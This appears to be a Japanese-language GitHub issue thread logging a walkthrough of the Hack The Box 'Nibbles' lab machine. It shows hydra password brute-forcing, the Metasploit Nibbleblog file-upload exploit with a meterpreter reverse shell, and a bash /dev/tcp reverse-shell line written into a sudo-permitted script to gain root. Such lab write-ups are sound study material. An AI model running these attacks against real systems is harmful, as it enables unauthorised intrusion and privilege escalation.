roaris
commented
6 months ago Open roaris opened 6 months ago
roaris
commented
6 months ago roaris
commented
6 months ago nibbleblogで検索するとhttps://github.com/dix0nym/CVE-2015-6967 が出てきた admin.phpにファイルをアップロードするものらしい
実際に/nibbleblog/admin.phpにアクセスすると、ログイン画面が出てきた SecListsの中には認証情報はなし
$ find /usr/share/SecLists -iname *nibble*hydraを使ってみる https://qiita.com/Hashibirokou/items/411a11779987043a5095 とりあえずユーザ名はadminで固定にする
$ hydra -f -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.75 http-post-form '/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username or password'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-10 22:22:35
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.10.75:80/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username or password
[80][http-post-form] host: 10.10.10.75 login: admin password: 12345
[STATUS] attack finished for 10.10.10.75 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-10 22:22:38admin/12345でログイン出来ることが分かった いざログインしようとすると、ブロックされたのでマシンを再起動する
roaris
commented
6 months ago admin/12345ではログイン出来なかった
何回もログイン試行をすると、ログインに失敗した旨ではなく、上記のようにNibbleblog security Errorが出てくるので、hydraが判定を間違えた
roaris
commented
6 months ago gobusterをする /nibbleblogをつけないと全然見つからない
$ gobuster dir --url http://10.10.10.75/nibbleblog --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.75/nibbleblog
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/content (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/themes (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/]
/admin (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
/plugins (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/README (Status: 200) [Size: 4628]
/languages (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]
Progress: 9452 / 87665 (10.78%)ディレクトリリスティングが有効になっているので辿っていける
しかし認証情報が見つからない
writeupを見るとadmin/nibblesと書いてあった(推測で当てるしかないとのこと) それは無理
roaris
commented
6 months ago multi/http/nibbleblog_file_uploadを使う
msf6 > search nibble
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nibbleblog_file_upload
msf6 > use exploit/multi/http/nibbleblog_file_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/nibbleblog_file_upload) > options
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the web application
USERNAME yes The username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.23.73.202 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Nibbleblog 4.0.3
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
PASSWORD => nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
RHOSTS => 10.10.10.75
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI nibbleblog
TARGETURI => nibbleblog
msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.16.5
LHOST => 10.10.16.5
msf6 exploit(multi/http/nibbleblog_file_upload) > exploit
[*] Started reverse TCP handler on 10.10.16.5:4444
[*] Sending stage (39927 bytes) to 10.10.10.75
[+] Deleted image.php
[*] Meterpreter session 1 opened (10.10.16.5:4444 -> 10.10.10.75:44882) at 2024-03-10 23:05:59 +0900
meterpreter > shell
Process 1630 created.
Channel 0 created.
whoami
nibblerプロンプトが出てこない
(追記) bash -i でプロンプトが出てくる
roaris
commented
6 months ago /home/nibblerにuser.txtがあった
/rootには移動出来ず
roaris
commented
6 months ago sudo -lを確認する sudoを実行するユーザに許可されているコマンドを一覧表示するとのこと https://atmarkit.itmedia.co.jp/ait/articles/1611/28/news036.html
sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh/home/nibblerにpersonal.zipがあり、これをunzipするとmonitor.shが出てくる
ls
personal.zip
user.txt
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.shmonitor.shは何のスクリプトか分からないが、これをリバースシェルのスクリプトに書き換えて、sudoで実行すればrootのリバースシェルが取れる
roaris
commented
6 months ago https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#bash-tcp にあるものを使ってみるも動かない(sudoをつけなければ動く)
nibbler@Nibbles:/home/nibbler$ echo "bash -i >& /dev/tcp/10.10.16.5/4242 0>&1" > personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ sudo ./personal/stuff/monitor.sh
sudo ./personal/stuff/monitor.sh
/home/nibbler/personal/stuff/monitor.sh: 2: /home/nibbler/personal/stuff/monitor.sh: Syntax error: Bad fd number動かない理由は謎だけど、rootユーザで実行できるなら、bash -iで十分だった
nibbler@Nibbles:/home/nibbler$ echo "bash -i" > personal/stuff/monitor.sh
echo "bash -i" > personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ sudo personal/stuff/monitor.sh
sudo personal/stuff/monitor.sh
bash: cannot set terminal process group (1330): Inappropriate ioctl for device
bash: no job control in this shell
root@Nibbles:/home/nibbler# whoami
whoami
root/rootにroot.txtがあった
https://app.hackthebox.com/machines/Nibbles